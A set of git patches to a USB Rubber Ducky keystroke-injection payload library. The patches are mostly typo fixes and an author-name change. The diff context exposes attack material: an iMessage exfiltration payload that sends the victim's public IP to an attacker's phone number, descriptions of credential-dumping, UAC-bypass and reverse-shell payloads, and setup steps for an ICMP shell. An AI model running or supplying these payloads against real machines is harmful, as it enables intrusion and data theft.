From b3c95f7b7dde81f7dad5384f016c43c959b02151 Mon Sep 17 00:00:00 2001 From: jbjb6000 <114012750+jbjb6000@users.noreply.github.com> Date: Thu, 8 Feb 2024 18:01:26 -0500 Subject: [PATCH 1/4] Update payload.txt Updated the zip file to point to the new version path. --- payloads/library/incident_response/GoodUSB/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/incident_response/GoodUSB/payload.txt b/payloads/library/incident_response/GoodUSB/payload.txt index 2347b64..c8d02c9 100644 --- a/payloads/library/incident_response/GoodUSB/payload.txt +++ b/payloads/library/incident_response/GoodUSB/payload.txt @@ -51,5 +51,5 @@ DELAY 4000 LEFT ENTER DELAY 4000 -STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-0.105.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam +STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-1.3.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam ENTER From 8bc5dd096c416ae0f481f02b05962254919ec3e4 Mon Sep 17 00:00:00 2001 From: Matthew Kayne <45180131+matthewkayne@users.noreply.github.com> Date: Wed, 6 Mar 2024 20:34:11 +0000 Subject: [PATCH 2/4] Update payload.txt Fixed spelling and grammar errors in the comments --- .../library/exfiltration/iMessage-Data-Grabber/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt b/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt index 4a9c00c..20ee796 100644 --- a/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt +++ b/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt @@ -13,12 +13,12 @@ STRING Terminal DELAY 200 ENTER DELAY 200 -REM Change this command inside the brackets too any command that outputs text to the terminal +REM Change this command inside the brackets to any command that outputs text to the terminal STRING x=$(curl ifconfig.me) DELAY 200 ENTER DELAY 200 -REM Replace PHONE_NUMBER with you iMessage supported number (leave the @'s, they are required to run) +REM Replace PHONE_NUMBER with your iMessage supported number (leave the @'s, they are required to run) STRING osascript -e 'tell application @Messages@ to send @'$x'@ to buddy @PHONE_NUMBER@' DELAY 100 ENTER From e606d300116e48272ebe4dbcc50fbab4475ccb1c Mon Sep 17 00:00:00 2001 From: Superuser2047 <160431987+Superuser2047@users.noreply.github.com> Date: Sat, 11 May 2024 16:31:53 -0600 Subject: [PATCH 3/4] Update README.md Fixed typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7e689d0..d2471bd 100644 --- a/README.md +++ b/README.md @@ -116,7 +116,7 @@ Core to its success is its simple language, DuckyScript™. Originally just thre ## DuckyScript 3.0 DuckyScript 3.0 is a feature rich, structured programming language. It includes all of the previously available commands and features of the original DuckyScript. -(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 paylaods are valid DuckyScript 3.0) +(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 payloads are valid DuckyScript 3.0) Additionally, DuckyScript 3.0 introduces [control flow constructs](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements "View Documentation"), [loops](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops "View Documentation"), [functions](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions "View Documentation"), [extensions](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions "View Documentation"). Plus, DuckyScript 3.0 includes many features specific to [keystroke injection](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection "View Documentation") attack/automation, such as [HID & Storage attack modes](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes "View Documentation"), OS Detection, [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#the-keystroke-reflection-attack "View Documentation") ([Video + Whitepaper](https://shop.hak5.org/pages/keystroke-reflection "Keystroke Reflection Video + Whitepaper")), [jitter](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter "View Documentation") and [randomization](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization "View Documentation") to name a few. From 40f7f072ea9fc428a9ef991b13c8e3e0838c99ed Mon Sep 17 00:00:00 2001 From: 0i41E <79219148+0i41E@users.noreply.github.com> Date: Tue, 28 May 2024 19:25:26 +0200 Subject: [PATCH 4/4] Changed Username --- payloads/extensions/community/DETECT_FINISHED | 2 +- .../extensions/community/POWERSHELL_DOWNLOAD | 2 +- .../community/ROLLING_POWERSHELL_EXECUTION | 2 +- .../community/WINDOWS11_CONSOLE_DOWNGRADE | 2 +- .../community/WINDOWS_ELEVATED_EXECUTION | 2 +- .../community/WINDOWS_FILELESS_HID_EXFIL | 2 +- .../credentials/BitLockerKeyDump/payload.txt | 10 +++++----- .../credentials/BitLockerKeyDump/readme.md | 2 +- .../library/credentials/SamDumpDucky/README.md | 4 ++-- .../library/credentials/SamDumpDucky/payload.txt | 10 +++++----- .../WindowsLicenseKeyExfiltration.txt | 10 +++++----- .../WindowsLicenseKeyExfiltration/readme.md | 2 +- .../execution/DuckyHelper/DuckyHelper.txt | 2 +- .../exfiltration/ClipBoard-Creep/README.md | 6 +++--- .../exfiltration/ClipBoard-Creep/payload.txt | 8 ++++---- .../library/exfiltration/HashDumpDucky/README.md | 4 ++-- .../exfiltration/HashDumpDucky/payload.txt | 2 +- .../library/general/EngagementDucky/readme.md | 6 +++--- payloads/library/general/duckin8or/payload.txt | 2 +- payloads/library/prank/-RD-AcidBurn/README.md | 2 +- payloads/library/prank/-RD-JumpScare/README.md | 2 +- payloads/library/prank/EternalLock/payload.txt | 2 +- payloads/library/prank/SoundChangeDuck/README.md | 2 +- .../library/prank/SoundChangeDuck/payload.txt | 2 +- .../PingZhellDucky/PingZhellDucky.pl | 2 +- .../remote_access/PingZhellDucky/README.md | 16 ++++++++-------- .../remote_access/PingZhellDucky/payload.txt | 4 ++-- .../remote_access/ReverseDucky/ReverseDucky.txt | 2 +- .../ReverseDuckyII/ReverseDuckyII.txt | 2 +- .../remote_access/ReverseDuckyIII/payload.txt | 2 +- .../ReverseDuckyPolymorph/README.md | 6 +++--- .../ReverseDuckyPolymorph/payload.txt | 2 +- .../remote_access/ReverseDuckyUltimate/README.md | 16 ++++++++-------- .../ReverseDuckyUltimate/payload.txt | 12 ++++++------ 34 files changed, 77 insertions(+), 77 deletions(-) diff --git a/payloads/extensions/community/DETECT_FINISHED b/payloads/extensions/community/DETECT_FINISHED index 3af4600..75fc23c 100644 --- a/payloads/extensions/community/DETECT_FINISHED +++ b/payloads/extensions/community/DETECT_FINISHED @@ -1,6 +1,6 @@ EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: diff --git a/payloads/extensions/community/POWERSHELL_DOWNLOAD b/payloads/extensions/community/POWERSHELL_DOWNLOAD index 9e67d3b..3b50b52 100644 --- a/payloads/extensions/community/POWERSHELL_DOWNLOAD +++ b/payloads/extensions/community/POWERSHELL_DOWNLOAD @@ -1,6 +1,6 @@ EXTENSION POWERSHELL_DOWNLOAD REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM Downloads the desired file via powershell REM Use the method you want to use, via the specific function, define the URL and the output. diff --git a/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION b/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION index 2738fa7..e64dae1 100644 --- a/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION +++ b/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION @@ -1,6 +1,6 @@ EXTENSION ROLLING_POWERSHELL_EXECUTION REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM OS: Windows REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Requirements: PayloadStudio v.1.3 minimum diff --git a/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE b/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE index 41df572..230b58d 100644 --- a/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE +++ b/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE @@ -1,7 +1,7 @@ EXTENSION WINDOWS11_CONSOLE_DOWNGRADE REM_BLOCK Version: 1.0 - Author: 0iphor13 + Author: 0i41E Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. END_REM diff --git a/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION b/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION index 9e817e0..419b6e7 100644 --- a/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION +++ b/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION @@ -1,6 +1,6 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION REM VERSION 1.1 - REM Author: 0iphor13 + REM Author: 0i41E REM Executes the desired program with elevated privileges REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts REM additional extensions diff --git a/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL b/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL index 597325b..a0cada8 100644 --- a/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL +++ b/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL @@ -1,6 +1,6 @@ EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. diff --git a/payloads/library/credentials/BitLockerKeyDump/payload.txt b/payloads/library/credentials/BitLockerKeyDump/payload.txt index cee6125..aedd6b4 100644 --- a/payloads/library/credentials/BitLockerKeyDump/payload.txt +++ b/payloads/library/credentials/BitLockerKeyDump/payload.txt @@ -1,7 +1,7 @@ REM BitLockerKeyDump REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection @@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT END_REM END_EXTENSION -REM Extension made by 0iphor13 to signalize the payloads end +REM Extension made by 0i41E to signalize the payloads end EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: @@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED END_FUNCTION END_EXTENSION -REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys +REM Extension made by 0i41E for fileless exfiltration via Lock Keys EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. diff --git a/payloads/library/credentials/BitLockerKeyDump/readme.md b/payloads/library/credentials/BitLockerKeyDump/readme.md index 7fd6559..5a7bc76 100644 --- a/payloads/library/credentials/BitLockerKeyDump/readme.md +++ b/payloads/library/credentials/BitLockerKeyDump/readme.md @@ -1,6 +1,6 @@ **Title: BitLockerKeyDump** -
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/credentials/SamDumpDucky/README.md b/payloads/library/credentials/SamDumpDucky/README.md
index 384a32e..e1e8ef2 100644
--- a/payloads/library/credentials/SamDumpDucky/README.md
+++ b/payloads/library/credentials/SamDumpDucky/README.md
@@ -1,6 +1,6 @@
**Title: SamDumpDucky**
-
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 2.0
@@ -23,4 +23,4 @@ Afterwards you can use a tool like pypykatz to extract the users hashes.
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/execution/DuckyHelper/DuckyHelper.txt b/payloads/library/execution/DuckyHelper/DuckyHelper.txt
index 6fc6557..26d3023 100644
--- a/payloads/library/execution/DuckyHelper/DuckyHelper.txt
+++ b/payloads/library/execution/DuckyHelper/DuckyHelper.txt
@@ -1,7 +1,7 @@
REM DuckyHelper
REM Version 1.0
REM OS: Windows 10
-REM Author: 0iphor13
+REM Author: 0i41E
REM UAC bypass for privilege escalation (Method FodHelper)
REM AV will notify, but payload will still be executed
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/README.md b/payloads/library/exfiltration/ClipBoard-Creep/README.md
index 67cc32b..58ecdef 100644
--- a/payloads/library/exfiltration/ClipBoard-Creep/README.md
+++ b/payloads/library/exfiltration/ClipBoard-Creep/README.md
@@ -6,12 +6,12 @@ Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrat
### #HOOK ###
Define your webhook under #HOOK
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)
### #CALLBACK_DELAY ###
Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)
After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook.
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
index a9a01dc..7851df7 100644
--- a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
+++ b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
@@ -1,10 +1,10 @@
REM Clipboard-Creep
REM Version 1.0
REM OS: Windows
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
-REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep
+REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep
EXTENSION PASSIVE_WINDOWS_DETECT
@@ -52,7 +52,7 @@ END_EXTENSION
EXTENSION EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0
- REM Author: 0iphor13
+ REM Author: 0i41E
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
@@ -132,7 +132,7 @@ END_EXTENSION
EXTENSION Detect_Finished
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
diff --git a/payloads/library/exfiltration/HashDumpDucky/README.md b/payloads/library/exfiltration/HashDumpDucky/README.md
index 9e7171c..9c97e74 100644
--- a/payloads/library/exfiltration/HashDumpDucky/README.md
+++ b/payloads/library/exfiltration/HashDumpDucky/README.md
@@ -1,6 +1,6 @@
**Title: HashDumpDucky**
-
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Requirements: DuckyScript 3.0
Version: 1.0
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Requirements: DuckyScript 3.0
Version: 1.0
EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.
Step up your game and demonstrate impact in a few seconds without leaving your scope.
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 1.0
Author: 0iphor13
+
Author: 0i41E
OS: Windows & Unix
Version: 1.2
Requirements: DuckyScript 3.0, perl
Plug your Ducky into a Windows target.
Achieve reverse shell.
@@ -38,7 +38,7 @@ Achieve reverse shell.
**Instruction Version 2:**
Without automatic setup:
Define INSTALL and set it to FALSE
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)
Upload PingZhellDucky.pl onto your attacking machine.
Install dependencies, if needed:
@@ -50,10 +50,10 @@ Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
Start the client -> `perl PingZhellDucky.pl`
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
Define the IP of your attacking machine between the quotes at the ATTACKER section
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
+![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
Plug your Ducky into a Windows target.
Achieve reverse shell.
diff --git a/payloads/library/remote_access/PingZhellDucky/payload.txt b/payloads/library/remote_access/PingZhellDucky/payload.txt
index 4e8d257..8b6ab86 100644
--- a/payloads/library/remote_access/PingZhellDucky/payload.txt
+++ b/payloads/library/remote_access/PingZhellDucky/payload.txt
@@ -1,7 +1,7 @@
REM PingZhellDucky
REM Version 1.2
REM OS: Windows & Unix
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirements: DuckScript 3.0, Perl
REM Getting remote access via ICMP or perform the required setup
@@ -54,7 +54,7 @@ REM Do you want to install the dependencies and set up the infratructre?
REM Will trigger when not using Windows - Best use with Linux
DEFINE INSTALL TRUE
REM Link to the PingZhellDucky.pl client - Required for installation
-DEFINE CLIENTLINK https://raw.githubusercontent.com/0iphor13/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
+DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
IF ($_OS == WINDOWS) THEN
diff --git a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
index 2f425ec..4a3adee 100644
--- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
+++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
@@ -1,7 +1,7 @@
REM ReverseDucky
REM Version 2.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
diff --git a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
index d71b496..4cb1e4c 100644
--- a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
+++ b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
@@ -1,7 +1,7 @@
REM ReverseDuckyII
REM Version 2.0
REM OS: Windows / Multi
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
diff --git a/payloads/library/remote_access/ReverseDuckyIII/payload.txt b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
index 8039dd8..12fb17e 100644
--- a/payloads/library/remote_access/ReverseDuckyIII/payload.txt
+++ b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
@@ -1,7 +1,7 @@
REM ReverseDucky3
REM Version 1.2 (End of Life - This payload won't be updated anymore)
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
-REM Author: 0iphor13
+REM Author: 0i41E
REM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.
REM Fill in Attacker-IP and Port in Line 18
diff --git a/payloads/library/remote_access/ReverseDuckyPolymorph/README.md b/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
index 65fb083..29bf73a 100644
--- a/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
+++ b/payloads/library/remote_access/ReverseDuckyPolymorph/README.md
@@ -1,6 +1,6 @@
**Title: ReverseDuckyPolymorph**
-
Author: 0iphor13, Korben
+
Author: 0i41E, Korben
OS: Windows
Version: 1.1
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 1.0
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum